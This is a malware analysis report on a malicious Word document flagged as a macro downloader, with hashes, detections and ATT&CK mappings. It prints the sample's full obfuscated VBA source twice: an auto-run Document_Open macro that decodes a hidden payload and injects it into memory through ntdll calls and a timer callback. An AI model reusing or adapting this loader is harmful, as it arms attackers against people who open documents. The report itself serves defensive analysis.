Office (OLE) malware analysis — malicious · 562836cf74eec979

MALICIOUS

Office (OLE)

250.5 KB Created: 2018-02-22 14:08:00 Authoring application: Microsoft Office Word First seen: 2018-03-04

MD5: 3843781b8cc55cdd5837e5adfd2e8fc0 SHA-1: 0d77d4488436f5c496ad19fa0bbab9090f7e7d63 SHA-256: 562836cf74eec97971c8311250aa1fbb90f632b06f383a87b5ffd0d0eb49b623

110 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file contains VBA macros, including a Document_Open macro, and a heuristic indicates a lure to enable macros. ClamAV detected it as a downloader. The VBA code appears to be obfuscated, but the presence of macro execution and the downloader signature strongly suggest it is designed to fetch and execute a secondary payload. No specific family could be identified.

Heuristics 5

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim garner As Long
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11234 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11234 bytes
SHA-256: `ee8dd307cd935ba5bfcdd39024bf5c5ef0af4b300c9aed2876e16c0e1e221b7a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim garner As Long Dim soonest As String succurrere jello = 14 + 4 Pmt 0, jello, 30053, 25323, 2 End Sub Attribute VB_Name = "dacoity" Attribute VB_Base = "0{B6822881-FEC9-4F29-BCFE-8474F31E2A2C}{A0AD38B0-8DEF-4930-B293-21DDB81ACDD3}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "avirgin" #If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then Public Declare PtrSafe Function dearest _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (endlessness As LongPtr, dans As LongPtr, ByVal commiserative As LongPtr, pattererByVal As LongPtr, headshake As LongPtr, ByVal canorous As LongPtr) As LongPtr #End If #If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then Public Declare Function dearest _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (further As Long, artifactual As Long, ByVal wagner As Long, backerByVal As Long, encroach As Long, ByVal creak As Long) As Long #End If Public Function unlawfulness(flunk, beseechingly, mildly) Dim anisometropic As Long Dim mammal As Long Dim captiousness As Long Dim awkwardly As Long Dim cockroach As Long anisometropic = flunk cockroach = mildly arrack = hydration captiousness = beseechingly nonskid = 40 + 2 Pmt 0, nonskid, 8941, 44755, 5 malo = malo mammal = 122 - 58 - 65 bleach ByVal mammal, _ anisometropic, _ captiousness, _ cockroach, awkwardly End Function Function textual(bubulcus, promenade, orpington) If orpington = (22 + (10 / 2 - 5)) Then textual = bubulcus \ promenade ElseIf orpington = (32 + (5 - 3) / 2 - 1) Then textual = bubulcus And promenade ElseIf orpington = (40 + (56 / 7 - 4 * 2)) Then textual = bubulcus * promenade End If End Function Function drunkanddisorderly(juryman) Dim doeil As Long Dim ingrowth As String Dim wingstem As Variant Dim micrometeoritic As Variant #If (104 - 102 + 398 + 83 - 59 + 276) > ((19 - 18 + 319) - (30 - 45 + 555) * 1) And ((120 - 62 - 30) - (103 - 93 + 18)) * 2 < (Win64) Then Dim barrels As Variant Dim coldbloodedly As LongPtr deerberry = 26 - 117 + 99 Dim serif As LongPtr Dim orycteropodidae As Long Dim elicited As Byte Dim bruchus As LongPtr Dim buckleya As Integer meum = VarPtr(coldbloodedly) dangler = punster(meum, VarPtr(juryman) + (23 - 106 + 91), deerberry) #End If #If (118 - 107 + 389 + 24 - 84 + 360) > ((121 - 31 + 230) - (19 - 74 + 595) * 1) And Not ((44 - 98 + 82) - (96 - 88 + 20)) * 2 < (Win64) Then Dim coldbloodedly As Long deerberry = 73 - 58 - 11 Dim serif As Long Dim bruchus As Long meum = VarPtr(coldbloodedly) dangler = unlawfulness(meum, VarPtr(juryman) + (64 - 49 - 7), deerberry) #End If circumfuse = 35 - 73 + 37 serif = 32 - 66 + 34 elitism = 92 - 127 + 35 bruchus = 81 - 128 + 9635 pretensions = 94 - 45 + 4047 neutrino = 62 - 23 + 25 accomplishments = dearest(ByVal circumfuse, _ serif, ByVal elitism, bruchus, ByVal pretensions, _ ByVal neutrino) flawers = unlawfulness(serif, coldbloodedly, 78 - 57 + 5862) palmiped = 25 + 56 Pmt 0, palmiped, 28049, 29833, 8 drunkanddisorderly = serif End Function Attribute VB_Name = "fixedns" #If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then Public Declare Function bleach _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal unannounced As Any, ByVal bluish As Any, ByVal motherhood As Any, ByVal aeneus As Any, ByVal elephantidae As Any) As Long #End If #If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then Public Declare PtrSafe Function tetragonia _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (cowgirl As Any, ByVal fulgoridae As Any, ByVal abbe As Any, ByVal painfulness As Any, ByVal nationalization As Any, ByVal assemblyroom As Any, ByVal autogamous As Any) As Long #End If Function punster(mastering, cornerstone, flagging) Dim emulsifier As String Dim aluminum As Long Dim tetanus As LongPtr Dim aqaba As LongPtr Dim medica As LongPtr Dim pectic As Integer Dim calotte As LongPtr Dim musingly As LongPtr malo = hydration aqaba = mastering musingly = flagging hydration = "gratified" calotte = cornerstone cluttered = 6 + 43 Pmt 0, cluttered, 9645, 37184, 2 hydration = "induction" tetanus = 1 - 111 + 109 bleach ByVal tetanus, _ aqaba, _ calotte, musingly, _ medica arrack = "beadsman" End Function Function succurrere() Dim aspheric As Long Dim carry As Byte dacoity.nonvenomous.Value = Day(#12/5/2013#) varday = colter = symbiotically firmware = "dives" altimetry = "spaying" armhole = skeg cymbelinel = "entourage" riptide = "scorpaenidae" glioma = "ruddle" Set vulvar = dacoity.nonvenomous.SelectedItem obstetric = 37 + 57 Pmt 0, obstetric, 28909, 23035, 3 match = vulvar.Name loma = 70 - 127 + 7901 bedground = Right(match, loma) eppur = compose(bedground) minor = 32 + 55 Pmt 0, minor, 31079, 36564, 5 kolami = "cotidal" cordwain = "sarracenia" #If (55 - 65 + 410 + 67 - 125 + 358) > ((102 - 64 + 282) - (115 - 37 + 462) * 1) And ((73 - 22 - 23) - (20 - 65 + 73)) * 2 < (Win64) Then Dim coarctation As Long Dim allay As LongPtr Dim unilateralist As LongPtr Dim simmer As Integer Dim inchoative As String Dim abloom As LongPtr Dim megaderma As LongPtr Dim oilseed As LongPtr analogous = 15 - 109 + 2158 #End If #If (124 - 67 + 343 + 120 - 3 + 183) > ((42 - 82 + 360) - (13 - 85 + 612) * 1) And Not ((1 - 114 + 141) - (90 - 47 - 15)) * 2 < (Win64) Then Dim changeless As String Dim unilateralist As Long Dim combed As Variant Dim allay As Long Dim abloom As Long cebu = 43 - 49 + 787 Dim megaderma As Long Dim oilseed As Long analogous = cebu + 3459 #End If carborundum = 61 - 67 + 6 excessively = tuscarora alienable = 50 - 14 + 4060 rendering = 38 + 34 Pmt 0, rendering, 12216, 39138, 6 naris = "blattodea" timothy = embezzle apology = "corallorhiza" kimono = "adducent" loll = 39 + 23 Pmt 0, loll, 19470, 36077, 3 bubbliness = eppur composing = "donetsk" allay = (drunkanddisorderly(bubbliness)) domini = unipolar Dim frustrating As Variant Dim memphis As String abloom = 45 - 62 + 17 unilateralist = allay + analogous megaderma = 70 - 127 + 201584 oilseed = 114 - 69 + 3455 hypernymy = (tetragonia(megaderma, abloom, _ unilateralist, abloom, abloom, _ abloom, abloom)) groupware = 3 + 9 Pmt 0, groupware, 3795, 30210, 6 End Function Attribute VB_Name = "maimai" #If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then Public Declare PtrSafe Function bleach _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal amenra As Any, ByVal scot As Any, ByVal wheeziness As Any, ByVal inchon As Any, ByVal equerry As Any) As LongPtr #End If #If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then Public Declare Function tetragonia _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (scott As Any, ByVal mundify As Any, ByVal swart As Any, ByVal maxime As Any, ByVal stole As Any, ByVal arpents As Any, ByVal aristate As Any) As Long #End If Function amidships() Dim hobble(255) As Byte anaphoric = 91 - 49 + 23 For i = anaphoric To (39 - 22 + 74) hobble(anaphoric) = anaphoric - (41 - 117 + 141) anaphoric = anaphoric + 1 If (14 - 89 + 166) < anaphoric Then Exit For End If Next anaphoric = (116 - 11 - 57) For i = anaphoric To (38 - 18 + 38) hobble(anaphoric) = anaphoric + (14 - 98 + 88) anaphoric = anaphoric + 1 If (64 - 18 + 12) < anaphoric Then Exit For End If Next anaphoric = (25 - 34 + 106) For i = anaphoric To (9 - 68 + 182) hobble(anaphoric) = anaphoric - (116 - 93 + 48) anaphoric = anaphoric + 1 If (125 - 71 + 69) < anaphoric Then Exit For End If Next hobble(60 - 115 + 102) = (42 - 105 + 126) anaphoric = (29 - 32 + 46) hobble(anaphoric) = (74 - 50 + 38) amidships = hobble End Function Function compose(discriminate) As String Dim butterfly As Long Dim lapidation(63) As Long Dim benefactor(6962) As Byte Dim afraid As Integer Dim designedly As Long Dim audiometry(63) As Long Dim coltsfoot As String Dim discalced As Long Dim monocotyledonous() As Byte hydration = arrack Dim autobiographical(63) As Long Dim diapensiaceae As Long Dim snarling As String tabloid = 9 - 50 + 105 flowret = 3 - 84 + 16515153 xerophyllum = 33 - 33 + 258048 galore = 78 - 41 + 65243 obtruncate = 107 - 104 + 252 punily = 69 - 15 + 262090 sango = 24 - 76 + 16711732 Dim polarity As Variant unobeyed = 108 - 44 + 4032 oxandra = 114 - 41 + 183 nonsuccess = 112 - 90 + 4010 slummocky = 96 - 45 + 65485 Dim navigability As Integer tashmit = 60 - 14 + 17 Dim lophiidae As Long chrysophyceae = 15 - 87 + 7915 Dim urgent() As Byte urgent = VBA.StrConv(discriminate, 120 + 8) porcelain = 4 + 31 Pmt 0, porcelain, 19415, 40832, 2 toweling = 7843 maidan = vbKeyShift - 12 For besteht = 0 To toweling If besteht Mod 2 = 0 Then urgent(besteht) = urgent(besteht) - maidan Else urgent(besteht) = urgent(besteht) - (maidan - 1) End If Next besteht electrocardiogram = 54 + 44 Pmt 0, electrocardiogram, 4079, 52578, 7 afraid = 0 deliverer = amidships For discalced = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) autobiographical(discalced) = textual(discalced, tabloid, 40) audiometry(discalced) = textual(discalced, unobeyed, 40) lapidation(discalced) = textual(discalced, punily, 40) Next discalced centrospermae = 36 + 55 Pmt 0, centrospermae, 36543, 43418, 6 monocotyledonous = urgent butylene = 72 - 102 + 34 abstain = 58 + 57 Pmt 0, abstain, 35373, 29145, 6 fitment = 27 - 48 + 24 ormazd = fitment + 1 adjudicate = 114 - 32 - 80 For butterfly = 0 To toweling cabman = monocotyledonous(butterfly) valve = monocotyledonous(butterfly + 2) beggars = audiometry(deliverer(monocotyledonous(butterfly + 1))) edmontonia = autobiographical(deliverer(valve)) + deliverer(monocotyledonous(butterfly + fitment)) diapensiaceae = lapidation(deliverer(cabman)) + beggars + edmontonia discalced = textual(diapensiaceae, sango, 32) benefactor(designedly) = textual(discalced, slummocky, 22) discalced = textual(diapensiaceae, galore, 32) benefactor(designedly + 1) = textual(discalced, oxandra, 22) benefactor(designedly + adjudicate) = textual(diapensiaceae, obtruncate, 32) designedly = designedly + adjudicate + 1 butterfly = butterfly + 3 Next compose = benefactor End Function Attribute VB_Name = "Module1"

SHA-256: ee8dd307cd935ba5bfcdd39024bf5c5ef0af4b300c9aed2876e16c0e1e221b7a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
Dim garner As Long
Dim soonest As String
succurrere
jello = 14 + 4
 Pmt 0, jello, 30053, 25323, 2
End Sub




Attribute VB_Name = "dacoity"
Attribute VB_Base = "0{B6822881-FEC9-4F29-BCFE-8474F31E2A2C}{A0AD38B0-8DEF-4930-B293-21DDB81ACDD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Attribute VB_Name = "avirgin"
#If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then
Public Declare PtrSafe Function dearest _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (endlessness As LongPtr, dans As LongPtr, ByVal commiserative As LongPtr, pattererByVal As LongPtr, headshake As LongPtr, ByVal canorous As LongPtr) As LongPtr
#End If
#If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then
Public Declare Function dearest _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (further As Long, artifactual As Long, ByVal wagner As Long, backerByVal As Long, encroach As Long, ByVal creak As Long) As Long
#End If
Public Function unlawfulness(flunk, beseechingly, mildly)
Dim anisometropic As Long
Dim mammal As Long
Dim captiousness As Long
Dim awkwardly As Long
Dim cockroach As Long
anisometropic = flunk
cockroach = mildly
arrack = hydration
captiousness = beseechingly
nonskid = 40 + 2
Pmt 0, nonskid, 8941, 44755, 5
malo = malo
mammal = 122 - 58 - 65
bleach ByVal mammal, _
anisometropic, _
captiousness, _
cockroach, awkwardly
End Function
Function textual(bubulcus, promenade, orpington)
If orpington = (22 + (10 / 2 - 5)) Then
textual = bubulcus \ promenade
ElseIf orpington = (32 + (5 - 3) / 2 - 1) Then
textual = bubulcus And promenade
ElseIf orpington = (40 + (56 / 7 - 4 * 2)) Then
textual = bubulcus * promenade
End If
End Function
Function drunkanddisorderly(juryman)
Dim doeil As Long
Dim ingrowth As String
Dim wingstem As Variant
Dim micrometeoritic As Variant
#If (104 - 102 + 398 + 83 - 59 + 276) > ((19 - 18 + 319) - (30 - 45 + 555) * 1) And ((120 - 62 - 30) - (103 - 93 + 18)) * 2 < (Win64) Then
Dim barrels As Variant
Dim coldbloodedly As LongPtr
deerberry = 26 - 117 + 99
Dim serif As LongPtr
Dim orycteropodidae As Long
Dim elicited As Byte
Dim bruchus As LongPtr
Dim buckleya As Integer
meum = VarPtr(coldbloodedly)
dangler = punster(meum, VarPtr(juryman) + (23 - 106 + 91), deerberry)
#End If
#If (118 - 107 + 389 + 24 - 84 + 360) > ((121 - 31 + 230) - (19 - 74 + 595) * 1) And Not ((44 - 98 + 82) - (96 - 88 + 20)) * 2 < (Win64) Then
Dim coldbloodedly As Long
deerberry = 73 - 58 - 11
Dim serif As Long
Dim bruchus As Long
meum = VarPtr(coldbloodedly)
dangler = unlawfulness(meum, VarPtr(juryman) + (64 - 49 - 7), deerberry)
#End If
circumfuse = 35 - 73 + 37
serif = 32 - 66 + 34
elitism = 92 - 127 + 35
bruchus = 81 - 128 + 9635
pretensions = 94 - 45 + 4047
neutrino = 62 - 23 + 25
accomplishments = dearest(ByVal circumfuse, _
serif, ByVal elitism, bruchus, ByVal pretensions, _
ByVal neutrino)
flawers = unlawfulness(serif, coldbloodedly, 78 - 57 + 5862)
palmiped = 25 + 56
Pmt 0, palmiped, 28049, 29833, 8
drunkanddisorderly = serif
End Function

Attribute VB_Name = "fixedns"
#If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then
Public Declare Function bleach _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal unannounced As Any, ByVal bluish As Any, ByVal motherhood As Any, ByVal aeneus As Any, ByVal elephantidae As Any) As Long
#End If
#If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then
Public Declare PtrSafe Function tetragonia _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (cowgirl As Any, ByVal fulgoridae As Any, ByVal abbe As Any, ByVal painfulness As Any, ByVal nationalization As Any, ByVal assemblyroom As Any, ByVal autogamous As Any) As Long
#End If
Function punster(mastering, cornerstone, flagging)
Dim emulsifier As String
Dim aluminum As Long
Dim tetanus As LongPtr
Dim aqaba As LongPtr
Dim medica As LongPtr
Dim pectic As Integer
Dim calotte As LongPtr
Dim musingly As LongPtr
malo = hydration
aqaba = mastering
musingly = flagging
hydration = "gratified"
calotte = cornerstone
cluttered = 6 + 43
Pmt 0, cluttered, 9645, 37184, 2
hydration = "induction"
tetanus = 1 - 111 + 109
bleach ByVal tetanus, _
aqaba, _
calotte, musingly, _
medica
arrack = "beadsman"
End Function
Function succurrere()
Dim aspheric As Long
Dim carry As Byte
dacoity.nonvenomous.Value = Day(#12/5/2013#)
varday = colter = symbiotically
firmware = "dives"
altimetry = "spaying"
armhole = skeg
cymbelinel = "entourage"

riptide = "scorpaenidae"
glioma = "ruddle"
Set vulvar = dacoity.nonvenomous.SelectedItem
obstetric = 37 + 57
 Pmt 0, obstetric, 28909, 23035, 3

match = vulvar.Name
loma = 70 - 127 + 7901
bedground = Right(match, loma)
eppur = compose(bedground)
minor = 32 + 55
 Pmt 0, minor, 31079, 36564, 5

kolami = "cotidal"
cordwain = "sarracenia"
#If (55 - 65 + 410 + 67 - 125 + 358) > ((102 - 64 + 282) - (115 - 37 + 462) * 1) And ((73 - 22 - 23) - (20 - 65 + 73)) * 2 < (Win64) Then
Dim coarctation As Long
Dim allay As LongPtr
Dim unilateralist As LongPtr
Dim simmer As Integer
Dim inchoative As String
Dim abloom As LongPtr
Dim megaderma As LongPtr
Dim oilseed As LongPtr
analogous = 15 - 109 + 2158
#End If
#If (124 - 67 + 343 + 120 - 3 + 183) > ((42 - 82 + 360) - (13 - 85 + 612) * 1) And Not ((1 - 114 + 141) - (90 - 47 - 15)) * 2 < (Win64) Then
Dim changeless As String
Dim unilateralist As Long
Dim combed As Variant
Dim allay As Long
Dim abloom As Long
cebu = 43 - 49 + 787
Dim megaderma As Long
Dim oilseed As Long
analogous = cebu + 3459
#End If
carborundum = 61 - 67 + 6
excessively = tuscarora
alienable = 50 - 14 + 4060
rendering = 38 + 34
Pmt 0, rendering, 12216, 39138, 6
naris = "blattodea"
timothy = embezzle
apology = "corallorhiza"
kimono = "adducent"
loll = 39 + 23
Pmt 0, loll, 19470, 36077, 3
bubbliness = eppur
composing = "donetsk"
allay = (drunkanddisorderly(bubbliness))
domini = unipolar
Dim frustrating As Variant
Dim memphis As String
abloom = 45 - 62 + 17
unilateralist = allay + analogous
megaderma = 70 - 127 + 201584
oilseed = 114 - 69 + 3455
hypernymy = (tetragonia(megaderma, abloom, _
unilateralist, abloom, abloom, _
abloom, abloom))
groupware = 3 + 9
Pmt 0, groupware, 3795, 30210, 6
End Function

Attribute VB_Name = "maimai"
#If (101 - 125 + 424 + 36 - 88 + 352) > ((121 - 106 + 305) - (15 - 102 + 627) * 1) And ((75 - 28 - 19) - (114 - 26 - 60)) * 2 < (Win64) Then
Public Declare PtrSafe Function bleach _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal amenra As Any, ByVal scot As Any, ByVal wheeziness As Any, ByVal inchon As Any, ByVal equerry As Any) As LongPtr
#End If
#If (35 - 19 + 384 + 108 - 38 + 230) > ((74 - 43 + 289) - (82 - 24 + 482) * 1) And Not ((67 - 105 + 66) - (11 - 6 + 23)) * 2 < (Win64) Then
Public Declare Function tetragonia _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (scott As Any, ByVal mundify As Any, ByVal swart As Any, ByVal maxime As Any, ByVal stole As Any, ByVal arpents As Any, ByVal aristate As Any) As Long
#End If
Function amidships()
Dim hobble(255) As Byte
anaphoric = 91 - 49 + 23
For i = anaphoric To (39 - 22 + 74)
hobble(anaphoric) = anaphoric - (41 - 117 + 141)
anaphoric = anaphoric + 1
If (14 - 89 + 166) < anaphoric Then
Exit For
End If
Next
anaphoric = (116 - 11 - 57)
For i = anaphoric To (38 - 18 + 38)
hobble(anaphoric) = anaphoric + (14 - 98 + 88)
anaphoric = anaphoric + 1
If (64 - 18 + 12) < anaphoric Then
Exit For
End If
Next
anaphoric = (25 - 34 + 106)
For i = anaphoric To (9 - 68 + 182)
hobble(anaphoric) = anaphoric - (116 - 93 + 48)
anaphoric = anaphoric + 1
If (125 - 71 + 69) < anaphoric Then
Exit For
End If
Next
hobble(60 - 115 + 102) = (42 - 105 + 126)
anaphoric = (29 - 32 + 46)
hobble(anaphoric) = (74 - 50 + 38)
amidships = hobble
End Function
Function compose(discriminate) As String
Dim butterfly As Long
Dim lapidation(63) As Long
Dim benefactor(6962) As Byte
Dim afraid As Integer
Dim designedly As Long
Dim audiometry(63) As Long
Dim coltsfoot As String
Dim discalced As Long
Dim monocotyledonous() As Byte
hydration = arrack
Dim autobiographical(63) As Long
Dim diapensiaceae As Long
Dim snarling As String
tabloid = 9 - 50 + 105
flowret = 3 - 84 + 16515153
xerophyllum = 33 - 33 + 258048
galore = 78 - 41 + 65243
obtruncate = 107 - 104 + 252
punily = 69 - 15 + 262090
sango = 24 - 76 + 16711732
Dim polarity As Variant
unobeyed = 108 - 44 + 4032
oxandra = 114 - 41 + 183
nonsuccess = 112 - 90 + 4010
slummocky = 96 - 45 + 65485
Dim navigability As Integer
tashmit = 60 - 14 + 17
Dim lophiidae As Long
chrysophyceae = 15 - 87 + 7915
Dim urgent() As Byte
urgent = VBA.StrConv(discriminate, 120 + 8)
porcelain = 4 + 31
Pmt 0, porcelain, 19415, 40832, 2
toweling = 7843
maidan = vbKeyShift - 12
For besteht = 0 To toweling
If besteht Mod 2 = 0 Then
urgent(besteht) = urgent(besteht) - maidan
Else
urgent(besteht) = urgent(besteht) - (maidan - 1)
End If
Next besteht
electrocardiogram = 54 + 44
Pmt 0, electrocardiogram, 4079, 52578, 7
afraid = 0
deliverer = amidships
For discalced = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
autobiographical(discalced) = textual(discalced, tabloid, 40)
audiometry(discalced) = textual(discalced, unobeyed, 40)
lapidation(discalced) = textual(discalced, punily, 40)
Next discalced
centrospermae = 36 + 55
Pmt 0, centrospermae, 36543, 43418, 6
monocotyledonous = urgent
butylene = 72 - 102 + 34
abstain = 58 + 57
 Pmt 0, abstain, 35373, 29145, 6
fitment = 27 - 48 + 24
ormazd = fitment + 1
adjudicate = 114 - 32 - 80
For butterfly = 0 To toweling
cabman = monocotyledonous(butterfly)
valve = monocotyledonous(butterfly + 2)
beggars = audiometry(deliverer(monocotyledonous(butterfly + 1)))
edmontonia = autobiographical(deliverer(valve)) + deliverer(monocotyledonous(butterfly + fitment))
diapensiaceae = lapidation(deliverer(cabman)) + beggars + edmontonia
discalced = textual(diapensiaceae, sango, 32)
benefactor(designedly) = textual(discalced, slummocky, 22)
discalced = textual(diapensiaceae, galore, 32)
benefactor(designedly + 1) = textual(discalced, oxandra, 22)
benefactor(designedly + adjudicate) = textual(diapensiaceae, obtruncate, 32)
designedly = designedly + adjudicate + 1
butterfly = butterfly + 3
Next
compose = benefactor
End Function

Attribute VB_Name = "Module1"

Open this report in the interactive analyzer, or submit your own file for analysis.